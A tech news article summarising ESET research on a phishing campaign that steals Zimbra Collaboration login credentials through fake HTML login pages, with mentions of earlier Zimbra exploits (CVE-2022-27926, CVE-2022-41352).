Hackers Reportedly Steal Accounts of Zimbra Users

Hackers reportedly steal accounts of Zimbra users. New reports now making the rounds claim that someone out there is currently sending out convincing phishing emails via Zimbra accounts.

Hackers Steal Accounts of Zimbra Users

Hackers Steal Accounts of Zimbra Users

A new phishing campaign that is targeting users of the Zimbra Collaboration email servers has been sighted, and researchers reacting to the new development claim that it is quite successful.

Zimbra Collaboration as you should know is an online collaborative suite that comes with an email server as well as a web client.

And according to researchers from ESET, cybercriminals began sending phishing emails to victims at random back in April 2023, in a bid to obtain login credentials for the service.

The attackers in these emails in question, get to assume the identity of the organization administrator of the victim, and then tell the recipient that their email server is about to be updated. This update as you should know will make the email inbox quite inaccessible, and then possibly result in termination.

How the Threat Actors Acted

And in a bid to ensure that does not happen, the victim in question is advised to open the HTML file that is attached to the email and then review the instructions that are found there.

The attachment in question here, however, holds no form of instructions. Instead, it reportedly shows a fake Zimbra login page with the username already prefilled, where users can get to type in their passwords. These in question are then sent to the server of the attacker via an HTTPS POST request.

In most cases, ESET further stated that the attackers would make use of compromised admin accounts prior to the moment in a bid to create new accounts on Zimbra servers simply for phishing email distribution, thus further adding to the perceived legitimacy of the emails. They are currently saying that the campaign is hardly sophisticated, but its results, on the other hand, are really “impressive”.

Zimbra Collaboration Email Servers Commonly Targeted By Cybercriminals

And according to reports from BleepingComputer, Zimbra Collaboration email servers as you should know are “commonly” targeted by cybercriminals. They make use of them for cyber espionage, thus collecting internal company communications. They also can at most times use them as an initial point of breach, to move further laterally all through the targeted network.

Other Times Zimbra Email Servers Were Hacked

One such scenario happened in the early parts of this year when a Russian threat actor reportedly abused a vulnerability in the tool (CVE-2022-27926) in a bid to snoop on emails that were belonging to organizations that are aligned with the North Atlantic Treaty Organization (NATO). Governments, diplomats, and even military personnel were also all targeted, the publication stated.

Another attack took place in October 2022, when over 900 servers were hacked all thanks to a Zimbra zero-day. Kaspersky then labeled the flaw as a remote code execution vulnerability that enabled threat actors to send an email with a malicious file that helped to deploy a webshell in the Zimbra server without getting to trigger an antivirus alarm. It is now tracked as CVE-2022-41352 and many researchers reportedly claim as many as 1,600 servers were compromised as a result of the incident.



Please enter your comment!
Please enter your name here